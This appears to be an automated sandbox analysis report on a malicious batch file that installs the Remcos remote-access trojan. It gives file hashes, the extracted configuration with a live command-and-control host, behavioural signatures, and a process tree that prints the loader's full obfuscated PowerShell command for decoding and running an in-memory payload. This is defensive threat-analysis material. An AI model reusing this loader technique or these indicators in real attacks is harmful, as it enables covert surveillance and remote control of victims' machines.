Analysis

  • max time kernel
    300s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2024 04:39

General

  • Target

    Cobro_876634226701191038128011582367096095686646340584195296708193218.bat

  • Size

    1.8MB

  • MD5

    1698e898da21c028d3bfc61cbf0904aa

  • SHA1

    acd1043cec76eacee19eb78b37b4a0624bc350f3

  • SHA256

    075e65d20779e5ffdbe58f96c3639d6a6db830c41e100e68e0d45361ee2cc099

  • SHA512

    466baec151eb73eeebe4b92a15b0046035019d19da9a7236d5d5e409ed61dd95469aed729eeb37eaab0bf905d5360bffd0b83975c3f5709888e10dd4ff401f61

  • SSDEEP

    24576:Gyc27ntMASfw1Tr0s3OoF3A+HcA0uuSpYFIgu9k/gnJyi2QvqxspBVskiXLf5:dtwQYs+M3N8A0ud79yS92QvqNt

Malware Config

Extracted

Family

remcos

Botnet

VIVERO2

C2

viveroelgirasol.com:2406

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    lgs.dat

  • keylog_flag

    false

  • keylog_folder

    WinLog

  • mouse_option

    false

  • mutex

    qwerty2024-GHME8E

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2188
        • C:\Windows\system32\chcp.com
          chcp 65001
          3⤵
            PID:4440
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:3228
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow
              3⤵
                PID:3440
              • C:\Windows\system32\attrib.exe
                attrib +s +h C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow
                3⤵
                • Sets file to hidden
                • Views/modifies file attributes
                PID:2416
              • C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow
                C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -WindowStyle hidden -command "$Amwfvap = get-content 'C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat' | Select-Object -Last 1; $Lahapqm = [System.Convert]::FromBase64String($Amwfvap);$Wmhuprvc = New-Object System.IO.MemoryStream( , $Lahapqm );$Swwilmyw = New-Object System.IO.MemoryStream;$Haozxiw = New-Object System.IO.Compression.GzipStream $Wmhuprvc, ([IO.Compression.CompressionMode]::Decompress);$Haozxiw.CopyTo( $Swwilmyw );$Haozxiw.Close();$Wmhuprvc.Close();[byte[]] $Lahapqm = $Swwilmyw.ToArray();[Array]::Reverse($Lahapqm); $Uzzzux = [System.AppDomain]::CurrentDomain.Load($Lahapqm); $Xtqfmtdiwhr = $Uzzzux.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Xtqfmtdiwhr.DeclaringType, $Xtqfmtdiwhr.Name).DynamicInvoke() | Out-Null"
                3⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4844
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1372

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\WinLog\lgs.dat

            Filesize

            144B

            MD5

            851b3a63b0d1ea3c90b473387be6d3bf

            SHA1

            5c9a0690eade6ea8ee7a278f822b84122a1bbafa

            SHA256

            43bf4cb6e883c7ba7714c03afa73bdba1f988d5895453f5c22693e3f2788eb56

            SHA512

            0b8886e2943bca707a0ef8866232e0fd83ccdb21d423283e801af09cdfbf7a02ce6ed2d638457856ecb4e33349c11247c33888a4e1cbff683e1e22187aa72c5c

          • C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgc5hejl.a5i.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1372-1125-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1372-1133-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/4844-5-0x000000007475E000-0x000000007475F000-memory.dmp

            Filesize

            4KB

          • memory/4844-6-0x0000000002B30000-0x0000000002B66000-memory.dmp

            Filesize

            216KB

          • memory/4844-7-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-8-0x00000000053A0000-0x00000000059C8000-memory.dmp

            Filesize

            6.2MB

          • memory/4844-9-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-10-0x0000000005140000-0x0000000005162000-memory.dmp

            Filesize

            136KB

          • memory/4844-11-0x00000000052E0000-0x0000000005346000-memory.dmp

            Filesize

            408KB

          • memory/4844-12-0x0000000005A40000-0x0000000005AA6000-memory.dmp

            Filesize

            408KB

          • memory/4844-22-0x0000000005AB0000-0x0000000005E04000-memory.dmp

            Filesize

            3.3MB

          • memory/4844-23-0x0000000006100000-0x000000000611E000-memory.dmp

            Filesize

            120KB

          • memory/4844-24-0x00000000061B0000-0x00000000061FC000-memory.dmp

            Filesize

            304KB

          • memory/4844-25-0x00000000070D0000-0x0000000007166000-memory.dmp

            Filesize

            600KB

          • memory/4844-26-0x0000000006620000-0x000000000663A000-memory.dmp

            Filesize

            104KB

          • memory/4844-27-0x0000000006670000-0x0000000006692000-memory.dmp

            Filesize

            136KB

          • memory/4844-28-0x0000000007780000-0x0000000007D24000-memory.dmp

            Filesize

            5.6MB

          • memory/4844-29-0x00000000083B0000-0x0000000008A2A000-memory.dmp

            Filesize

            6.5MB

          • memory/4844-30-0x0000000007260000-0x000000000751E000-memory.dmp

            Filesize

            2.7MB

          • memory/4844-31-0x0000000007D30000-0x0000000007E4E000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-33-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-35-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-91-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-95-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-93-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-89-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-87-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-85-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-83-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-81-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-79-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-75-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-71-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-69-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-67-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-65-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-61-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-59-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-55-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-53-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-51-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-49-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-47-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-45-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-43-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-39-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-77-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-73-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-63-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-57-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-41-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-37-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-32-0x0000000007D30000-0x0000000007E48000-memory.dmp

            Filesize

            1.1MB

          • memory/4844-1106-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-1107-0x0000000007E50000-0x0000000007EE8000-memory.dmp

            Filesize

            608KB

          • memory/4844-1108-0x0000000004E70000-0x0000000004EBC000-memory.dmp

            Filesize

            304KB

          • memory/4844-1112-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-1113-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-1114-0x0000000007710000-0x0000000007764000-memory.dmp

            Filesize

            336KB

          • memory/4844-1115-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB

          • memory/4844-1124-0x0000000074750000-0x0000000074F00000-memory.dmp

            Filesize

            7.7MB